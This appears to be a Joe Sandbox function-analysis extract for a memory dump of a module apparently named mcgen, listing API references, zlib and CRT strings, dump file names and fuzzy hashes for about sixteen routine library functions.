Function 00007FF6B9F3411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6B9F3416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F347D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F34C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F34E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F35067
memcpy_s.LIBCPMT ref: 00007FF6B9F35142
memcpy_s.LIBCPMT ref: 00007FF6B9F351ED
memcpy_s.LIBCPMT ref: 00007FF6B9F352BC

Strings

1#QNAN, xrefs: 00007FF6B9F34283
1#INF, xrefs: 00007FF6B9F34293
1#SNAN, xrefs: 00007FF6B9F3427A
1#IND, xrefs: 00007FF6B9F34257

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 88640b59e6e4a52b6569a94c6933650c5ad6aa15132693da438acdef858c2e77
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: 2CB2BD72E1C2928AE7748E79D440BFD77A9FB443AAF505135DB0D97A88DF3CA9008B41

Function 00007FF6B9F1AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid code lengths set, xrefs: 00007FF6B9F1AE9D
invalid literal/length code, xrefs: 00007FF6B9F1B452
invalid distances set, xrefs: 00007FF6B9F1B210
invalid code -- missing end-of-block, xrefs: 00007FF6B9F1B136
too many length or distance symbols, xrefs: 00007FF6B9F1AEB6
invalid bit length repeat, xrefs: 00007FF6B9F1B109
invalid distance code, xrefs: 00007FF6B9F1B624
invalid literal/lengths set, xrefs: 00007FF6B9F1B1A3
invalid distance too far back, xrefs: 00007FF6B9F1B6E0

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 30824cea8c7b405e9e24bb6d52d9c5e109bc7a0fae373c4c29b0cf2357093921
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 9D52E3B2A146B68BD7948F29C458B7E3BADEB45752F024139E74A87784DF3CD844CB80

Function 00007FF6B9F1D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6B9F1D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF6B9F1D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6B9F1D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6B9F1D240
IsDebuggerPresent.KERNEL32 ref: 00007FF6B9F1D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B9F1D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6B9F1D2BC

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: a10eb50ef8d3c616057b37d137d934aebbc826aeae8d3f015f728331e9156540
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 96313A72608A8186EB648F65E8903EE7368FB8575AF04453ADB4E87B94EF3CD548C710

Function 00007FF6B9F35C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6B9F35CB5

Part of subcall function 00007FF6B9F35608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3561C

Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8

Part of subcall function 00007FF6B9F2A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B9F2A94F,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2A979
Part of subcall function 00007FF6B9F2A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B9F2A94F,?,?,?,?,?,00007FF6B9F2A83A), ref: 00007FF6B9F2A99E

_get_daylight.LIBCMT ref: 00007FF6B9F35CA4

Part of subcall function 00007FF6B9F35668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3567C

_get_daylight.LIBCMT ref: 00007FF6B9F35F1A
_get_daylight.LIBCMT ref: 00007FF6B9F35F2B
_get_daylight.LIBCMT ref: 00007FF6B9F35F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B9F3617C), ref: 00007FF6B9F35F63

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 0afe2a64c5a1336b23af8fc8b3dc956ec8cab5e4881cc7eee203a1a5dc21c1c3
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 37D1BF22A0C65286EB30AF3ED8511B97769EF847A6F458136EB0DC7A86DF3CE441C741

Function 00007FF6B9F2A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6B9F2A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6B9F2A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF6B9F2A750
IsDebuggerPresent.KERNEL32 ref: 00007FF6B9F2A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B9F2A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6B9F2A79E

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 554166fb708fbcfe1c38927b2b8ea5ed09b9d8b815a126f6b8ad0dba66467519
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 9C316132618B8186DB60CF39E8502AE73A8FB897A9F540135EB9D83B94DF3CC145CB00

Function 00007FF6B9F318E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F31930
FindFirstFileExW.KERNEL32 ref: 00007FF6B9F31A3A

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 3e3785c8f7471dabcde35467f02e302d938a7ba00b2274936866cd6952efa076
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: F3B19022B1C69641EE719F3A94102BA63A9EB44BF6F449131EB5E87BC5EE3CE441C301

Function 00007FF6B9F35EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6B9F35F1A

Part of subcall function 00007FF6B9F35668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3567C

_get_daylight.LIBCMT ref: 00007FF6B9F35F2B

Part of subcall function 00007FF6B9F35608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3561C

_get_daylight.LIBCMT ref: 00007FF6B9F35F3C

Part of subcall function 00007FF6B9F35638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F3564C

Part of subcall function 00007FF6B9F2A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9CE
Part of subcall function 00007FF6B9F2A9B8: GetLastError.KERNEL32(?,?,?,00007FF6B9F32D92,?,?,?,00007FF6B9F32DCF,?,?,00000000,00007FF6B9F33295,?,?,?,00007FF6B9F331C7), ref: 00007FF6B9F2A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B9F3617C), ref: 00007FF6B9F35F63

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: ac1b9d1e3124378dd97f977c6bcc716ee98198e7d0911447f6ad6c6d7b41ddfb
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 94516E32A1C64286E720DF3ED9815A97768BB887A5F408135EB4DC3B96DF3CE440C741

Function 00007FF6B9F1D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6B9F1D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF6B9F1D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6B9F1D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6B9F1D0D6

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 34440b234048af7c0caae73a706fd96138bf31ed7102199fff99d2e117bcd4c8
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 0A111C26B18B058AEB10CF79E8552B933A8FB19769F440E31DB6D877A4DF7CD1588340

Function 00007FF6B9F33C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6B9F33CE6
memcpy_s.LIBCPMT ref: 00007FF6B9F33D11

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 6e27204c8650241e546bf33d386e96de512640f34691ed6bdcdb9adfbb834a5a
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 77C1E172B1C68A87EB34CF29A04466AB7A5F794B95F858134DB4E83784DF3DE844CB40

Function 00007FF6B9F1A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF6B9F1A991
, xrefs: 00007FF6B9F1A5CB
unknown header flags set, xrefs: 00007FF6B9F1A535

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: fbf704529857c100afd95aeadfd33a7347e28f4ea653886f5b739d89cf4ae08d
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 76F184B2A183F58BE7958F1D8088B3A3AADEF46765F464539DB4987390CF38D581C780

Function 00007FF6B9F39798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6B9F399E7
RaiseException.KERNEL32 ref: 00007FF6B9F399F8

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 729c38b1b6179367ff9bb466b291d2b4cdecc5f40f14c058201e0e4d1b662eb1
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 83B15877A18B89CAEB25CF2DC4463683BA0F784B69F148921DB5D837A5CF39D491C701

Function 00007FF6B9F23A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6B9F23DC4
, xrefs: 00007FF6B9F23B82

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: bb3c4394c00b2fe4ba5bf2b19029493131949138049934989211c9c5e44b8785
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: C8E1A6B6A0868687EB688F2D805023DB3A8FF45F6AF144135FB4E87695DF79E851C700

Function 00007FF6B9F1A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6B9F1A4B2
incorrect header check, xrefs: 00007FF6B9F1A4CB

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: e413a1defaac89465c48de46acfbfebb1537b47b3c9a43c1efa83c2af1aa1045
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: 6A91B9B2A182F587E7A48E28C448B3E3A9DFF45761F524139DB4987794CF38D581CB80

Function 00007FF6B9F2DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF6B9F2E06D
gfff, xrefs: 00007FF6B9F2E0EA

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: b83fe45f46fe692b85126f5bc5789e234f189f26aea3b973f7280b1e40f53039
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 6E516962F1C2C586E724CE39D8017697B96E744BA5F589231EBAC87AC5CF3DE445C700

Function 00007FF6B9F2DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6B9F2DE0E

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 93c406f526b0da921b1c028045ff056d40b9045a82e4270c10f594f63f3e544e
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 50A14663A08BC646EB21CF29A4107A97B99EB607A5F058032EF8D8B785DE3DD509C711

Function 00007FF6B9F28804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6B9F28823

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
Instruction ID: 270d96adeef7704d437ff070278859c1f52cfb1ac3df8482277db04f78f1f3ab
Opcode Fuzzy Hash: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
Instruction Fuzzy Hash: 05518011F1C68241FA64AF3E59112BA7299AF84BE6F598434EF0EC77D6EE3CE4158201

